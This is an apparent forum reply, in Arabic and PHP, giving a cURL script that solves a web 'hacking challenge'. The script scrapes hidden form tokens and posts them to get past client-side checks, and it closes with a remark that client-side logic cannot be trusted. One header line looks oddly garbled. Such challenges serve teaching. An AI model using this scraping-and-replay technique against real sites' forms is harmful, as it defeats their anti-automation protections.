كود PHP:
// GET
$con = curl_init('http://layan.us/go/hacking-challenge/index.php');
curl_setopt($con,CURLOPT_HTTPHEADER,array('Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg','Connection: Keep-Alive','(anti-spam-(anti-spam-(anti-spam-content-type:))) application/x-www-form-urlencoded;charset=UTF-8'));
curl_setopt($con,CURLOPT_HEADER,0);
curl_setopt($con,CURLOPT_USERAGENT,'mr_m');
curl_setopt($con,CURLOPT_ENCODING,'gzip');
curl_setopt($con,CURLOPT_TIMEOUT,30);
curl_setopt($con,CURLOPT_RETURNTRANSFER,1);
curl_setopt($con,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($con,CURLOPT_COOKIEFILE,'cookies.txt');
curl_setopt($con,CURLOPT_COOKIEJAR,'cookies.txt');
$original = $html = curl_exec($con);
curl_close($con);
// extract the parameters
$html = explode('name="codeX" value="',$html);
array_shift($html);
$html = implode('',$html);
list($c1) = explode('"',$html);
$html = explode('name="codeY',$html);
array_shift($html);
$html = implode('',$html);
list($c2) = explode('"',$html);
$c2 = 'codeY' . $c2;
// POST
$con = curl_init('http://layan.us/go/hacking-challenge/index.php');
curl_setopt($con,CURLOPT_HTTPHEADER,array('Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg','Connection: Keep-Alive','(anti-spam-(anti-spam-(anti-spam-content-type:))) application/x-www-form-urlencoded;charset=UTF-8'));
curl_setopt($con,CURLOPT_ENCODING,'gzip');
curl_setopt($con,CURLOPT_USERAGENT,'mr_m');
curl_setopt($con,CURLOPT_REFERER,'http://layan.us/go/hacking-challenge/index.php');
curl_setopt($con,CURLOPT_TIMEOUT,30);
curl_setopt($con,CURLOPT_RETURNTRANSFER,1);
curl_setopt($con,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($con,CURLOPT_COOKIEFILE,'cookies.txt');
curl_setopt($con,CURLOPT_COOKIEJAR,'cookies.txt');
curl_setopt($con,CURLOPT_POST,1);
curl_setopt($con,CURLOPT_POSTFIELDS,'name=mr_m&country=Swalif&codeX=' . $c1 . '&' . $c2 . '=1');
echo curl_exec($con);
curl_close($con);
* كما قال الاخ محب. اي شيء يكون client-side لا يمكن الوثوق به.